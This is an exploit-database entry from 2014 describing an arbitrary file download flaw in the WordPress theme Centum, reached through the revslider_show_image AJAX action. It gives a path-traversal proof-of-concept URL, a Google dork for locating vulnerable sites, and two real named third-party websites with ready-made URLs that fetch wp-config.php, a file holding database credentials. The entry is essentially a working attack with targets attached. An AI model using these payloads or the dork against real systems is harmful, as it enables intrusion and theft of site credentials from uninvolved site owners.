WordPress Theme Centum Arbitrary File Download Vulnerability

2014-09-18T00:00:00
ID 1337DAY-ID-22662
Type zdt
Reporter gujjar(pcp)
Modified 2014-09-18T00:00:00

Description

The WordPress theme Centum is affected by an arbitrary file download vulnerability.

POC: http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Google Dork: inurl:wp-content/themes/centum

Demo sites:
http://cecopgroup.com/sp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://www.tourmasters.co.nz/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
